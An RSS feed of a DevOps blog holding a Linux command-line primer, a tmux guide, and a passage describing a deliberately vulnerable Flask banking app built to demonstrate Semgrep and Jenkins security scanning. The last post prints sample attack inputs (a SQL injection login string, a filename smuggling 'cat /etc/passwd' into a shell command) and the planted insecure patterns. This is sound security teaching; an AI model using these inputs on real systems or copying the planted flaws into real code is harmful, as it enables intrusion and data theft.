<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Prakyath Reddy | DevOps, SRE & Cloud Architecture]]></title><description><![CDATA[Insights from a Sr. DevSecOps Engineer at RingCentral & Oracle. Expert in Kubernetes, CI/CD automation, and building secure, scalable cloud infrastructure for 450,000+ global customers]]></description><link>https://blog.prakyath.dev</link><generator>RSS for Node</generator><lastBuildDate>Wed, 29 Apr 2026 01:39:39 GMT</lastBuildDate><atom:link href="https://blog.prakyath.dev/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[Linux Fundamentals - What I Learned Getting Comfortable With the Command Line]]></title><description><![CDATA[The goal I set for myself was simple: learn to live completely in the command line. Even when working with something like AWS, use the CLI and avoid depending on the GUI.
This post is a compilation of]]></description><link>https://blog.prakyath.dev/linux-fundamentals-what-i-learned-getting-comfortable-with-the-command-line</link><guid isPermaLink="true">https://blog.prakyath.dev/linux-fundamentals-what-i-learned-getting-comfortable-with-the-command-line</guid><category><![CDATA[Linux]]></category><category><![CDATA[Devops]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[cli]]></category><category><![CDATA[vim]]></category><dc:creator><![CDATA[Prakyath Reddy]]></dc:creator><pubDate>Wed, 18 Mar 2026 04:11:57 GMT</pubDate><content:encoded><![CDATA[<p>The goal I set for myself was simple: learn to live completely in the command line. Even when working with something like AWS, use the CLI and avoid depending on the GUI.</p>
<p>This post is a compilation of what I picked up while doing that.</p>
<h2>Linux is Just the Kernel</h2>
<p>Linux is just the kernel, the software that controls and manipulates the system's hardware. A Linux Distribution is the complete package of the Linux kernel + GUI + default apps + package managers + shell, etc. that makes up an OS.</p>
<p>The kernel is like the engine of a car. The distro or OS is the complete car with chassis, AC, interiors, body and everything else.</p>
<h2>Raspberry Pi</h2>
<p>A Raspberry Pi is just the hardware, a bare circuit board on a minimal basis and specs. It does not come with an OS, kernel or GUI. It comes with RAM, but no built-in storage.</p>
<p>The kernel, OS, files, data - everything exists on a micro-SD card. Pi Imager (a flashing tool) can be downloaded from the Pi official website onto the SD card. Then we just insert the card and turn it on.</p>
<h2>Flashing - What It Really Means</h2>
<p>Usually in an SD card or any storage device, there's a structure for the file system that determines where a piece of data exists or should be added to. There's like a menu of the data, a system that handles the data and searches for it too.</p>
<p>When we connect a pendrive to a laptop, the laptop sees the pendrive as just another drive with its own file system, ex: EXT4. When we try to paste data into the pendrive, the EXT4 system tells the pendrive hardware where to place those specific bytes.</p>
<p>With flashing, we don't copy-paste the image into the SD card at a location instructed by the filesystem. Instead we bypass the entire file system and place the ISO image data block-by-block directly on the hardware of the SD card. It replaces whatever existed in those blocks previously.</p>
<p>Now, the SD card doesn't contain the image data in one of its blocks. The SD card becomes the OS from the hardware level itself.</p>
<p>Some tools for flashing:</p>
<ul>
<li><p><strong>Rufus</strong> - to repurpose an old Windows laptop into Linux</p>
</li>
<li><p><strong>BalenaEtcher</strong> - for macOS: <a href="https://etcher.balena.io/">https://etcher.balena.io/</a></p>
</li>
<li><p><strong>UTM</strong> - for virtualization on Mac (virtualizes ARM-native OS images, emulates other architectures using QEMU)</p>
</li>
<li><p><strong>VMware Fusion</strong> - also a good option for virtualization on macOS</p>
</li>
</ul>
<h2>Terminal vs Shell</h2>
<p>Terminal is just the visual interface. It does not understand commands or anything.</p>
<p>Shell is the primary engine that processes commands, talks to the kernel, receives the output and conveys it to the terminal to display. When you connect to a remote host, the terminal belongs to your local Mac, but the shell belongs to the remote host.</p>
<p>Bash is the shell program used on Linux, for Mac it is Zsh.</p>
<p>The flow looks like this: terminal reflects the input I pass from the keyboard -&gt; shell starts a process, parses it, expands it if needed -&gt; kernel starts a child process -&gt; kernel does the work, conveys the output and the child process exits -&gt; shell process conveys output to terminal -&gt; terminal displays the output.</p>
<p>Commands are just programs. <code>cat</code> is a program (<code>which cat</code> returns <code>/usr/bin/cat</code>). <code>ls</code> is a program too.</p>
<p>To check which shell I'm using: <code>echo \(SHELL</code>. What follows <code>\)</code> is a variable. We use caps when they are system variables or env variables set by the shell itself.</p>
<h2>Everything is a File on Linux</h2>
<p>This is one of those things that sounds abstract until you see it in practice.</p>
<p>Even processes are files. They may not be files that sit on the hard disk, but the kernel creates them on the fly just so I can read them using <code>cat</code>. The <code>/proc</code> folder is where the kernel presents process information as files. Similarly, every process gets its own directory of files that describe it. The kernel's process management is <em>presented</em> as files.</p>
<p><code>cat "something" &gt; /dev/null</code> - null is not really a file in <code>/dev</code>. It's just Linux's way of saying this is how you pass something into a black hole. But it looks like a file to any program, which makes it convenient to forward something into it.</p>
<p>When a program opens a network connection, the kernel creates a file descriptor that describes the connection. The program interacts with the file, and the corresponding actions are handled by the kernel. The program thinks it's "reading a file", but the kernel is actually pulling information from the network. The program thinks it's "writing to a file", but the kernel is actually sending data over the network.</p>
<p>Even pipes work this way. <code>ps aux | grep ssh</code> - <code>ps aux</code> just writes to a file and <code>grep ssh</code> just reads from a file. The pipe creates an anonymous file in between managing this process, but both commands think it's normal I/O.</p>
<h2>Key Directories</h2>
<ul>
<li><p><code>/home</code> - user home directories</p>
</li>
<li><p><code>/etc</code> - system configuration files</p>
</li>
<li><p><code>/var</code> - variable data: logs, databases, mail</p>
</li>
<li><p><code>/tmp</code> - temporary files</p>
</li>
<li><p><code>/usr</code> - where installed software lives</p>
</li>
<li><p><code>/bin</code> - most command binaries</p>
</li>
<li><p><code>/sbin</code> - system administration binaries</p>
</li>
<li><p><code>/opt</code> - optional 3rd party software</p>
</li>
<li><p><code>/dev</code> - device files</p>
</li>
<li><p><code>/proc</code> - process and kernel information</p>
</li>
</ul>
<h2>Installing Software</h2>
<p>Package managers vary by distro: <code>apt</code> for Debian-based (Ubuntu), <code>apk</code> for Alpine, <code>pacman</code> for Arch, <code>dnf</code> for RHEL/Fedora.</p>
<pre><code class="language-bash">sudo apt update                          # update package repository list
sudo apt upgrade                         # upgrade all installed packages
apt search htop                          # search for a package
apt show htop                            # show info about a package
sudo apt install htop tree curl vim      # install packages with dependencies
sudo apt remove htop                     # remove package, keep config files
sudo apt purge htop                      # remove package including config files
apt list --installed                     # list all installed packages
apt list --installed | grep htop         # search within installed packages
</code></pre>
<p>When we install a program, it usually comes with 2 kinds of files: program files that carry the binaries to run it, and configuration files that customize the environment and variables to our requirements. System-wide config files are stored in <code>/etc/</code>. User-specific config files are usually dotfiles in the home directory, ex: <code>.gitconfig</code>.</p>
<h2>Users, Groups &amp; Permissions</h2>
<pre><code class="language-bash">whoami                    # current user
who                       # logged in users
id                        # user and group IDs
sudo adduser testuser     # create user
sudo deluser testuser     # delete user
</code></pre>
<p>File permissions follow the format: <code>-rwxrwxrwx</code> - file type, then owner, group, others. Read is 4, write is 2, execute is 1.</p>
<pre><code class="language-bash">chmod 777 file-name       # or u+x, o+rw, etc.
chown user file           # change owner
chgrp group file          # change group
sudo -i                   # get root shell
</code></pre>
<h2>Input, Output &amp; Pipes</h2>
<p>Three streams: standard input, standard output, standard error.</p>
<pre><code class="language-bash">command &gt; file.txt              # redirect output to file
command &gt;&gt; file.txt             # append instead of overwrite
wc -l &lt; /etc/passwd            # redirect input from file
ls /nonexistant 2&gt; /dev/null   # discard error output
ls /etc/ /nonexist &amp;&gt; all.txt  # redirect both stdout and stderr
</code></pre>
<p>Pipes send stdout of one command into stdin of another:</p>
<pre><code class="language-bash">ls /etc | head -5
cat names.txt | sort | uniq -c
echo "HELLoo" | tr 'A-Z' 'a-z'
ls /etc/ | tee list.txt         # write to screen AND to a file
</code></pre>
<h2>Processes</h2>
<p>Processes have a PID, parent process (PPID), owner, and current state.</p>
<pre><code class="language-bash">ps aux                     # list all processes
htop                       # real-time process viewer
kill -9 &lt;PID&gt;              # kill a process
pkill -f "python script.py" # kill by matching pattern
sleep 60 &amp;                 # run in background
jobs                       # list background jobs
fg %1                      # bring job back to foreground
</code></pre>
<p>If a process is running in the foreground, <code>Ctrl+Z</code> pauses it, then <code>bg</code> takes it to the background.</p>
<h3>systemd</h3>
<p>systemd initializes the system at boot and manages services. It's a compiled binary on disk. Once the Linux kernel finishes initializing, it triggers systemd which becomes PID 1.</p>
<p>We use <code>systemctl</code> to interact with systemd, which handles starting, stopping or managing daemons. Unlike SysVinit which was the standard earlier, systemd runs the booting process in parallel. It manages the order of starting services, handles dependencies, mounts filesystems, sets up networking, manages user logins and so on.</p>
<p>Every service produces logs. journald captures those and can be queried through <code>journalctl</code>.</p>
<pre><code class="language-bash">sudo systemctl start cron            # start a service (stop, restart, enable, disable)
journalctl --since "1 hour ago"      # query logs
pstree                               # visualize process tree
</code></pre>
<h2>Networking</h2>
<p><code>192.168.xxx.xxx</code> always refers to a private internal network.</p>
<pre><code class="language-bash">ip a                # view IP address, look for inet line on eth0
ip route            # view routing table, default points to WiFi router (gateway)
hostname            # view hostname
ping &lt;ip&gt;           # test connectivity
curl https://example.com    # download files / make HTTP requests
wget &lt;url&gt;                  # download files
</code></pre>
<h3>Ports and Sockets</h3>
<p>A <strong>port</strong> is just a number. A <strong>socket</strong> is a combination of IP address + port number + protocol (TCP/UDP). When a program wants to connect over the network, it asks the kernel to create a socket.</p>
<p>One port can have multiple sockets. For example, when we start sshd, it binds to port 22 and calls <code>listen()</code> which is a system call. This socket is now in LISTEN state. When a client connects, the listening socket creates a new socket with state ESTABLISHED for that connection, while the original one continues listening.</p>
<pre><code class="language-bash">ss -tunlp           # see what ports are open and listening
ss -tun             # see active/established connections
</code></pre>
<h3><code>/etc/hosts</code></h3>
<p>Used to assign hostnames or shortcuts that we can easily remember, avoiding typing IP addresses every time. Can also be used to indirectly block websites by pointing, for example, <code>www.facebook.com</code> to the loopback address <code>127.0.0.1</code>.</p>
<h3>SSH</h3>
<p>How it works behind the scenes:</p>
<ol>
<li><p>Client runs <code>ssh username@ip-address</code></p>
</li>
<li><p>SSH client creates TCP connection to server on port 22</p>
</li>
<li><p>TCP 3-way handshake</p>
</li>
<li><p>Diffie-Hellman key exchange</p>
</li>
<li><p>Authentication (password or key)</p>
</li>
<li><p>Encrypted channel established</p>
</li>
<li><p>Commands from our terminal run on the remote server</p>
</li>
</ol>
<pre><code class="language-bash"># Generate SSH keys
ssh-keygen -t ed25519

# Copy public key to server
ssh-copy-id user@ip-address

# If ssh-copy-id isn't available
cat ~/.ssh/id_ed25519.pub | ssh user@192.168.100.71 "mkdir -p ~/.ssh &amp;&amp; cat &gt;&gt; ~/.ssh/authorized_keys"

# Disable password authentication on server
vi /etc/ssh/sshd_config    # change PasswordAuthentication to no
sudo systemctl restart ssh
</code></pre>
<p>SSH config for shortcuts (<code>~/.ssh/config</code>):</p>
<pre><code class="language-plaintext">Host linux
    HostName 192.168.1.12
    User admin
    IdentityFile ~/.ssh/id_ed25519
</code></pre>
<p>Now <code>ssh linux</code> just works.</p>
<p>Copy files with SCP:</p>
<pre><code class="language-bash">scp file.txt admin@192.168.1.12:/home/admin              # local to remote
scp admin@192.168.1.12:/var/log/syslog ./                 # remote to local
scp -r directory/ admin@192.168.1.12:/home/admin          # copy directory
</code></pre>
<h2>Tmux</h2>
<p>Any process we execute on a remote server through SSH will break if we lose connection to the server. I generally used nohup if I knew it was going to take a lot of time, which I now realize was a pretty amateur approach. I discovered that tmux offers a much better way. It lets us run multiple terminal sessions inside one window and keeps them running even if we lose the SSH connection to the server.</p>
<p>Suppose we want to carry out multiple tasks on the same server, we'd normally use multiple SSH connections. Tmux handles that by allowing us to monitor multiple windows and panes in the same SSH session - watch logs in one terminal, edit files in another, and run scripts in a third. Without tmux, we would need 3 SSH connections.</p>
<pre><code class="language-bash">sudo apt install tmux
tmux                              # start tmux
tmux new -s devops-lab            # create named session
tmux ls                           # list sessions
tmux attach -t devops-lab         # reattach to session
tmux kill-session -t devops-lab   # kill session
</code></pre>
<p>All tmux commands start with <code>Ctrl+b</code>:</p>
<p><strong>Sessions:</strong> <code>Ctrl+b d</code> to detach</p>
<p><strong>Windows</strong> (each window is a full terminal):</p>
<table>
<thead>
<tr>
<th>Shortcut</th>
<th>Action</th>
</tr>
</thead>
<tbody><tr>
<td><code>Ctrl+b c</code></td>
<td>Create new window</td>
</tr>
<tr>
<td><code>Ctrl+b n</code></td>
<td>Next window</td>
</tr>
<tr>
<td><code>Ctrl+b 2</code></td>
<td>Jump to window 2</td>
</tr>
<tr>
<td><code>Ctrl+b ,</code></td>
<td>Rename window</td>
</tr>
<tr>
<td><code>Ctrl+b &amp;</code></td>
<td>Close window</td>
</tr>
</tbody></table>
<p><strong>Panes</strong> (split each window into separate terminals):</p>
<table>
<thead>
<tr>
<th>Shortcut</th>
<th>Action</th>
</tr>
</thead>
<tbody><tr>
<td><code>Ctrl+b "</code></td>
<td>Split horizontally</td>
</tr>
<tr>
<td><code>Ctrl+b %</code></td>
<td>Split vertically</td>
</tr>
<tr>
<td><code>Ctrl+b arrows</code></td>
<td>Move between panes</td>
</tr>
<tr>
<td><code>Ctrl+b z</code></td>
<td>Toggle full-screen on a pane</td>
</tr>
</tbody></table>
<h2>Configuration &amp; Customization</h2>
<h3>Dotfiles</h3>
<p>Hidden files meant to manage configuration for the shell, editors, or other tools. Ex: <code>.zshrc</code>, <code>.bashrc</code>, <code>.profile</code>.</p>
<p><code>.profile</code> is loaded once during SSH or boot. Contains env variables, PATH, etc.</p>
<p><code>.bashrc</code> is loaded every time a new terminal opens because customizations like aliases, prompts, shell behaviors don't persist across terminals and cannot be inherited.</p>
<p>We usually put everything in <code>.bashrc</code> and then source it from <code>.profile</code> itself to maintain consistency.</p>
<h3>Starship Prompt</h3>
<p>Starship works across shells and VMs.</p>
<pre><code class="language-bash">curl -sS https://starship.rs/install.sh | sh
echo 'eval "$(starship init bash)"' &gt;&gt; ~/.bashrc
source ~/.bashrc
</code></pre>
<p>Starship reads <code>~/.config/starship.toml</code>, but it doesn't get created automatically:</p>
<pre><code class="language-bash">mkdir -p ~/.config
vi ~/.config/starship.toml
</code></pre>
<p>Minimal configuration:</p>
<pre><code class="language-toml">command_timeout = 1000
"$schema" = 'https://starship.rs/config-schema.json'
add_newline = true

[character]
success_symbol = '[➜](bold green)'

[package]
disabled = true
</code></pre>
<p>Explore more at: <a href="https://starship.rs/config/">https://starship.rs/config/</a></p>
<h3>Vim Configuration</h3>
<pre><code class="language-bash">cp /etc/vim/vimrc ~/.vimrc
# uncomment what's relevant
</code></pre>
<h3>Tmux Configuration</h3>
<pre><code class="language-bash">vi ~/.tmux.conf
</code></pre>
<pre><code class="language-plaintext"># Start window numbering at 1 (not 0)
set -g base-index 1
setw -g pane-base-index 1

# Enable mouse support
set -g mouse on

# Increase history limit
set -g history-limit 10000

# 256 color support
set -g default-terminal "tmux-256color"
set-option -sa terminal-overrides ',xterm-256color:RGB'
</code></pre>
<hr />
<p><em>Book to read next: Unix and Linux System Administration Handbook</em></p>
]]></content:encoded></item><item><title><![CDATA[Tmux - Why Every DevOps Engineer Should Use It]]></title><description><![CDATA[If you've ever had a long-running process die because your SSH connection dropped, you know the pain. I used to rely on nohup to keep things alive in the background, which worked but felt like a hack.]]></description><link>https://blog.prakyath.dev/tmux-why-every-devops-engineer-should-use-it</link><guid isPermaLink="true">https://blog.prakyath.dev/tmux-why-every-devops-engineer-should-use-it</guid><category><![CDATA[tmux]]></category><category><![CDATA[Devops]]></category><category><![CDATA[DevSecOps]]></category><category><![CDATA[Cloud]]></category><category><![CDATA[AWS]]></category><category><![CDATA[Kubernetes]]></category><dc:creator><![CDATA[Prakyath Reddy]]></dc:creator><pubDate>Tue, 17 Mar 2026 16:31:26 GMT</pubDate><content:encoded><![CDATA[<p>If you've ever had a long-running process die because your SSH connection dropped, you know the pain. I used to rely on <code>nohup</code> to keep things alive in the background, which worked but felt like a hack. Then I discovered tmux, and it changed how I work on remote servers entirely.</p>
<h2>The Problem</h2>
<p>Any process you run on a remote server through SSH is tied to that connection. Lose the connection, laptop sleeps, Wi-Fi drops, terminal closes, and your process dies with it. That deployment script you've been running for 30 minutes? Gone.</p>
<p>On top of that, if you need to do multiple things on the same server, watch logs, edit files, run scripts, you end up opening multiple SSH connections. That's multiple terminals, multiple authentication steps, and if your internet hiccups, all of them go down.</p>
<h2>How Tmux Solves This</h2>
<p>Tmux (Terminal Multiplexer) lets you run multiple terminal sessions inside a single SSH connection, and keeps them running even if you disconnect. You can detach, close your laptop, go grab coffee, come back, reattach, and everything is exactly where you left it.</p>
<p>It organizes your workspace into three layers:</p>
<ul>
<li><p><strong>Sessions</strong> - the outermost container. Persists on the server until you kill it.</p>
</li>
<li><p><strong>Windows</strong> - like tabs within a session. Each one is a full-screen terminal.</p>
</li>
<li><p><strong>Panes</strong> - splits within a window. Run different things side by side.</p>
</li>
</ul>
<h2>Getting Started</h2>
<p>Install tmux and start it:</p>
<pre><code class="language-bash">sudo apt install tmux
tmux
</code></pre>
<p>You'll notice a green status bar at the bottom. You're now inside tmux. All tmux commands start with a prefix: <code>Ctrl+b</code>, followed by another key.</p>
<h2>Session Management</h2>
<pre><code class="language-bash">tmux new -s devops-lab       # create a named session
tmux ls                      # list all sessions
tmux attach -t devops-lab    # reattach to a session
tmux kill-session -t devops-lab  # kill a session
</code></pre>
<table>
<thead>
<tr>
<th>Shortcut</th>
<th>Action</th>
</tr>
</thead>
<tbody><tr>
<td><code>Ctrl+b d</code></td>
<td>Detach from session (keeps running in background)</td>
</tr>
</tbody></table>
<h2>Window Management</h2>
<p>Each window is a full terminal, like having multiple tabs in one session, all through a single SSH connection.</p>
<table>
<thead>
<tr>
<th>Shortcut</th>
<th>Action</th>
</tr>
</thead>
<tbody><tr>
<td><code>Ctrl+b c</code></td>
<td>Create new window</td>
</tr>
<tr>
<td><code>Ctrl+b n</code></td>
<td>Next window</td>
</tr>
<tr>
<td><code>Ctrl+b 0-9</code></td>
<td>Jump to window by number</td>
</tr>
<tr>
<td><code>Ctrl+b ,</code></td>
<td>Rename current window</td>
</tr>
<tr>
<td><code>Ctrl+b &amp;</code></td>
<td>Close current window</td>
</tr>
</tbody></table>
<h2>Pane Management</h2>
<p>Panes split a window into multiple terminals. This is where tmux really shines, monitor logs in one pane, edit config in another, and run commands in a third.</p>
<table>
<thead>
<tr>
<th>Shortcut</th>
<th>Action</th>
</tr>
</thead>
<tbody><tr>
<td><code>Ctrl+b "</code></td>
<td>Split horizontally</td>
</tr>
<tr>
<td><code>Ctrl+b %</code></td>
<td>Split vertically</td>
</tr>
<tr>
<td><code>Ctrl+b ←↑→↓</code></td>
<td>Move between panes</td>
</tr>
<tr>
<td><code>Ctrl+b z</code></td>
<td>Toggle full-screen on a pane</td>
</tr>
</tbody></table>
<img src="https://cdn.hashnode.com/uploads/covers/6338e8dbfa20fa4bc8e57dfc/4a42eca1-b10a-441e-815f-e96d4e30d04a.png" alt="" style="display:block;margin:0 auto" />

<h2>My Typical Workflow</h2>
<p>When I SSH into a server for any real work, the first thing I do is:</p>
<pre><code class="language-bash">tmux new -s work
</code></pre>
<p>Then I set up my workspace, split into panes, tail logs on one side, keep a shell on the other. If I need to step away, <code>Ctrl+b d</code> to detach. When I'm back, <code>tmux attach -t work</code> picks up right where I left off.</p>
<p>No more lost processes. No more juggling multiple SSH connections. Just one session that survives anything.</p>
<hr />
<p><em>If you're working with remote servers in any capacity, make tmux part of your muscle memory. It's one of those tools that once you start using, you wonder how you ever worked without it.</em></p>
]]></content:encoded></item><item><title><![CDATA[How I Built a Deliberately Vulnerable Banking App to Demonstrate Automated Security Scanning with Semgrep and Jenkins]]></title><description><![CDATA[Most developers I've worked with believe their code is secure because their tests pass. I used to think the same. This post is about proving that belief wrong — with a working demo anyone can run them]]></description><link>https://blog.prakyath.dev/how-i-built-a-deliberately-vulnerable-banking-app-to-demonstrate-automated-security-scanning-with-semgrep-and-jenkins</link><guid isPermaLink="true">https://blog.prakyath.dev/how-i-built-a-deliberately-vulnerable-banking-app-to-demonstrate-automated-security-scanning-with-semgrep-and-jenkins</guid><dc:creator><![CDATA[Prakyath Reddy]]></dc:creator><pubDate>Wed, 11 Mar 2026 11:07:33 GMT</pubDate><content:encoded><![CDATA[<p>Most developers I've worked with believe their code is secure because their tests pass. I used to think the same. This post is about proving that belief wrong — with a working demo anyone can run themselves.</p>
<p>I built VulnBank: a deliberately vulnerable Flask banking application, wired up to a Jenkins CI/CD pipeline with Semgrep scanning at every stage. The goal was simple — show what automated security scanning actually looks like in practice, what it catches, and where its limits are.</p>
<p>The full project is available here: <a href="https://github.com/PrakyathReddy/VulnBank-Semgrep">https://github.com/PrakyathReddy/VulnBank-Semgrep</a></p>
<h3>THE CORE IDEA</h3>
<p>Functional correctness and security correctness are not the same thing.</p>
<p>A banking app can transfer money correctly, authenticate users correctly, and render pages correctly — and still be completely compromised by an attacker in under five minutes.</p>
<p>The demo makes this concrete. Every unit test passes. The app works exactly as intended. And yet Semgrep finds four blocking vulnerabilities the moment it scans the code.</p>
<p>That moment — tests green, Semgrep red, pipeline blocked — is the entire point.</p>
<h3>WHAT'S IN THE APP</h3>
<p>VulnBank is a minimal Flask app with six features, each containing an intentional vulnerability:</p>
<p>SQL Injection — Login Page</p>
<p>The login form concatenates user input directly into a SQL query string. An attacker can enter the username:</p>
<p>admin'--</p>
<p>and bypass the password check entirely. The double-dash comments out the rest of the query. No password needed. Logged in as admin.</p>
<p>This is one of the oldest and most common vulnerabilities in web applications. It's also one of the easiest to fix — parameterized queries solve it completely. But under deadline pressure, developers reach for f-strings, and this is what happens.</p>
<p><strong>IDOR</strong> — Account Viewer</p>
<p>After logging in, your account is at /account/1. If you change that number to /account/2, you see someone else's account. /account/3 shows another. There is no ownership check anywhere in the code — the app verifies you are logged in, but never verifies the account belongs to you.</p>
<p>This is an Insecure Direct Object Reference (IDOR). It's consistently in the OWASP Top 10 because it's so common and so easy to miss in code review.</p>
<p>Command Injection — File Upload</p>
<p>The file upload feature runs a shell command to inspect the uploaded file. The filename comes from the user and goes directly into that shell command with shell=True. An attacker uploads a file named:</p>
<p>photo.jpg; cat /etc/passwd</p>
<p>The shell executes both commands. The server's password file is returned.</p>
<p><strong>Hardcoded Secrets</strong></p>
<p>The Flask secret key, admin credentials, and AWS keys are all hardcoded directly in <a href="http://app.py">app.py</a>:</p>
<p>app.secret_key = "supersecretkey123" ADMIN_PASSWORD = "admin123" AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"</p>
<p>Anyone with repository access has these credentials. In a public repo, that means everyone.</p>
<p><strong>Weak Cryptography</strong> — Password Reset</p>
<p>Password reset tokens are generated using MD5 of the username. MD5 is cryptographically broken. The token for any user is deterministic and precomputable. An attacker who knows your username can generate your reset token without ever interacting with the server.</p>
<p><strong>Vulnerable Dependencies</strong></p>
<p>requirements.txt pins requests to version 2.18.0, which carries multiple known CVEs including credential exposure via HTTP redirects. The app also pins an old version of Flask with a known advisory.</p>
<h3>THE JENKINS PIPELINE</h3>
<p>The pipeline has five stages. Each one builds on the last:</p>
<p>Stage 1 — Checkout Jenkins pulls the latest code from the GitHub repository. Nothing runs until the code is local.</p>
<p>Stage 2 — Install Sets up a Python virtual environment, installs application dependencies, and installs Semgrep and pip-audit.</p>
<p>Stage 3 — Semgrep SAST Runs Semgrep against the application code with --config auto. Semgrep loads rules appropriate for the detected language (Python/Flask) and scans every file. This is where SQL injection, command injection, and NaN injection are caught.</p>
<p>Stage 4 — Semgrep Secrets Runs Semgrep with the p/secrets ruleset against the entire repository. Designed to catch hardcoded API keys, tokens, and credentials.</p>
<p>Stage 5 — SCA with pip-audit Runs pip-audit against requirements.txt. This stage reads every pinned dependency, queries vulnerability databases, and reports every known CVE. This is where the 17 vulnerabilities across four packages surface.</p>
<p>Stage 6 — Security Gate Evaluates whether any prior stage failed. If anything failed, the gate blocks deployment with a clear message. The deploy stage never runs.</p>
<h3>WHAT SEMGREP ACTUALLY FOUND</h3>
<p>Running 128 rules across 17 files, Semgrep reported four blocking findings:</p>
<p><strong>Finding 1</strong>: SQL Injection (Django rule) File: <a href="http://app.py">app.py</a>, Line 113 User input concatenated directly into a raw SQL query string.</p>
<p><strong>Finding 2</strong>: SQL Injection (Flask-specific rule) File: <a href="http://app.py">app.py</a>, Line 113 Same line, flagged by a Flask-specific rule as well. Two different rule authors caught the same issue independently — which adds confidence.</p>
<p><strong>Finding 3</strong>: NaN Injection File: <a href="http://app.py">app.py</a>, Line 175 User input passed directly into float(). An attacker can pass the string "nan" which Python will cast to float NaN, causing undefined comparison behavior downstream. This one was not intentionally planted — Semgrep found it anyway.</p>
<p><strong>Finding 4</strong>: subprocess with shell=True File: <a href="http://app.py">app.py</a>, Line 228 <a href="http://subprocess.run">subprocess.run</a> called with shell=True and user-controlled input. The command injection vulnerability.</p>
<p><strong>Scan summary: 4 findings, 4 blocking, 128 rules run, 17 files scanned.</strong></p>
<p>The command injection was caught. The SQL injection was caught twice. A bonus vulnerability nobody planted was found. The pipeline failed. Deploy was blocked.</p>
<p>What Semgrep Did Not Catch</p>
<p><strong>Hardcoded secrets</strong> - the generic strings like "supersecretkey123" and "admin123" did not match any pattern in the p/secrets ruleset. Semgrep's secrets rules are designed around recognisable formats: AWS key patterns that start with AKIA, GitHub tokens that start with ghp_, JWTs, private keys. A generic password assignment doesn't trigger them.</p>
<p>This is not a bug — it's a design decision. Flagging every string assignment would create overwhelming noise. But it means generic hardcoded credentials require either a paid tier with more rules, or custom rules written for your specific codebase.</p>
<p>IDOR was not caught either. IDOR is a logic flaw, not a code pattern. Semgrep can't know that your business rules require an ownership check on every account query — only you know that. This is exactly the use case for custom rules, which the project also includes.</p>
<h3>SCA: WHERE THE REAL NOISE IS</h3>
<p>pip-audit found 17 vulnerabilities across four packages: flask, requests, idna, and urllib3. This is what happens when you pin old dependency versions and never update them.</p>
<p>The requests package alone at version 2.18.0 carries four separate CVEs with fix versions ranging from 2.20.0 to 2.32.4. urllib3 at 1.21.1 carries sixteen vulnerabilities.</p>
<p>This is typical of real codebases. The application code might be relatively clean. The 99% of the codebase you didn't write — the dependencies — is often carrying years of unpatched vulnerabilities.</p>
<p>The SCA stage failed, which triggered the security gate, which blocked the deploy. This is the correct behavior.</p>
<h3>THE SECURITY GATE</h3>
<p>The security gate is the stage that makes everything meaningful. Without it, findings are advisory. Developers can see them, acknowledge them, and deploy anyway.</p>
<p>With a security gate:</p>
<p>Stage "Security gate" skipped due to earlier failure(s) SECURITY GATE FAILED — deployment blocked. Fix all findings before merging. Finished: FAILURE</p>
<p>The gate makes security non-negotiable. It enforces the shift-left philosophy not through culture or process, but through automation. Vulnerable code simply cannot reach production.</p>
<h3>WHAT THIS DEMONSTRATES</h3>
<p>After building and running this project end to end, a few things became very concrete:</p>
<p>Passing tests are not a security signal. All unit tests in the project pass. The app is functionally correct. The security failures are invisible to functional testing.</p>
<p>Speed matters. Semgrep scanned 17 files with 128 rules and returned results in seconds. A developer gets this feedback while they still have context about the code they just wrote.</p>
<p>Tools have limits. Semgrep missed the hardcoded secrets because they're generic strings. It missed the IDOR because it's a logic flaw. No tool catches everything. Understanding what a tool misses is as important as understanding what it catches.</p>
<p>Custom rules fill the gaps. The project includes custom Semgrep rules for IDOR detection and Flask-specific secret patterns. These are rules no public ruleset would ever have — because they're specific to this codebase's patterns. This is where the real depth of Semgrep becomes apparent.</p>
<p>SCA is often noisier than SAST. Four packages, seventeen vulnerabilities. Most of them are in transitive dependencies — packages you didn't choose, pulled in by packages you did choose. Managing this noise, distinguishing reachable from unreachable vulnerabilities, is where SCA tooling is still maturing.</p>
<h3>CONCEPTS EXPLAINED</h3>
<p>If some of the terminology in this post was unfamiliar, here is a plain-language breakdown of the key concepts behind what Semgrep does and why it works.</p>
<p>SAST — Static Application Security Testing</p>
<p>SAST analyses source code without executing the program. It reads your code as a structure and looks for patterns that indicate vulnerabilities — both known ones and potential ones.</p>
<p>The attacks SAST catches are a specific class: ones that do not require modifying source code at all. They come entirely through inputs the app itself asks for. A customer with malicious intent provides something unexpected, and the app handles it unsafely.</p>
<p>SQL Injection is the classic example. When an app asks for your name to look up your account, most users type their name. A malicious user types something like ' OR '1'='1' -- instead. The app takes that input and builds a SQL query from it. The attacker's input breaks out of the data context and becomes part of the query itself — extending it, modifying it, or bypassing it entirely. The impact ranges from reading data that should be private to corrupting the database to executing OS commands on the server. The fix is simple in principle: never treat input as an instruction. Use parameterized queries — curly-brace placeholders — which make it structurally impossible for input to escape the data context and become part of the command.</p>
<p>Command Injection works the same way at the OS level. The app accepts input and passes it to a shell command. A malicious user appends a semicolon and a second command. The shell runs both. The attacker now has the ability to run arbitrary commands on the backend server — delete files, exfiltrate data, install backdoors. The fix is to never pass user input directly to a shell. Use subprocess with a list of arguments and shell=False. Each argument is treated as a whole string and never parsed by the shell.</p>
<p>XSS — Cross Site Scripting — operates at the browser level rather than the server. When you log into a website, your browser downloads and executes that site's JavaScript. The site also gives you a cookie — a small token that identifies you so you don't have to log in on every page. JavaScript running on a page has access to those cookies, your session data, local storage, and the entire page content. If an attacker can inject a malicious script into a page — through an input field that isn't sanitized — your browser pulls that script down along with the legitimate code and executes it. The attacker's script can forward your cookies to their own server, log every keystroke, replace the entire page with a fake login form, or make network requests using your identity. The fix is to always treat user input as text, never as HTML. Before rendering any user-provided content back into a page, escape all HTML characters. The second line of defence is a Content Security Policy header — even if a script somehow gets in, the CSP header tells the browser only to execute scripts from verified, authorised sources.</p>
<p>How SAST Works Internally</p>
<p>To do any of this, SAST tools need to actually understand code rather than just search text. The pipeline looks like this:</p>
